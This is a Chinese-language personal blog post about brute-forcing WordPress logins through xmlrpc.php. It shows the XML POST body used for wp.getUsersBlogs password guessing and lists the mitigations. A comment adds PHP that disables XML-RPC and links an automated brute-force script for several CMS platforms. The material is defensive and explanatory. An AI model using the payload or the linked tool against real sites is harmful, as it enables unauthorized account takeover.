晚上学车回来之后逛Freebuf上看到的文章:利用xmlrpc.php对WordPress进行暴力破解攻击 ,然后想起之前在WooYun知识库中有一篇和WordPress相关的安全文章:超过16W的WordPress网站被用来做DDoS攻击,于是立马登陆服务器看看有木有什么扫描器光顾了我的blog,发现了不少404请求(不说了,这么多天每天都有,发现一个屏蔽一段),但是幸好没有xmlrpc.php页面的(不知是该高兴还是感觉落寞o(╯□╰)o)
然后顺着Freebuf上给出的相关链接:Blocking more WordPress xmlrpc.php attacks 结合Freebuf上的说明以及自己用Fiddler2进行的简单POST发包测试,学习到了些东西,这就够了。
浏览器直接访问:http://ixyzero.com/blog/xmlrpc.php
返回:XML-RPC server accepts POST requests only.
这次这种利用xmlrpc.php的攻击可以绕过WordPress登录接口的暴力破解防护。攻击的方式直接POST以下数据到xmlrpc.php.
<?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>username</value></param> <param><value>password</value></param> </params> </methodCall>
其中username字段是预先收集的用户名。password是尝试的密码。关于getUsersBlogs接口的更多信息可以参考官方的指南。
解决方案是:
What can I do to prevent these attacks?
Choose a strong password. Update WordPress and your plugins as soon as updates are available. Use two factor authentication.(选择一个足够复杂的密码(对任何暴力破解的防护均适用);及时更新WordPress及其插件;安装/启用Google的两步验证功能插件)
Doing just those three things will ensure that attacks like this have no effect on your site, whether your hosting company is able to block them or not.
《 “利用xmlrpc.php对WordPress进行暴力破解攻击” 》 有 2 条评论
/**
* Disable XML-RPC & X-Pingback
* http://wordpress.stackexchange.com/questions/219643/best-way-to-eliminate-xmlrpc-php
* http://wordpress.stackexchange.com/questions/31943/is-there-a-way-to-completely-turn-off-pingbacks-trackbacks
* http://www.wpbeginner.com/plugins/how-to-disable-xml-rpc-in-wordpress/
*/
`// Disable use XML-RPC
add_filter( ‘xmlrpc_enabled’, ‘__return_false’ );
// Disable X-Pingback to header
function disable_x_pingback( $headers ) {
unset( $headers[‘X-Pingback’] );
return $headers;
}
add_filter( ‘wp_headers’, ‘disable_x_pingback’ );
`
自动化暴力破解 WordPress, Joomla, DruPal, OpenCart, Magento 等站点账户密码的Perl脚本
https://github.com/Moham3dRiahi/XBruteForcer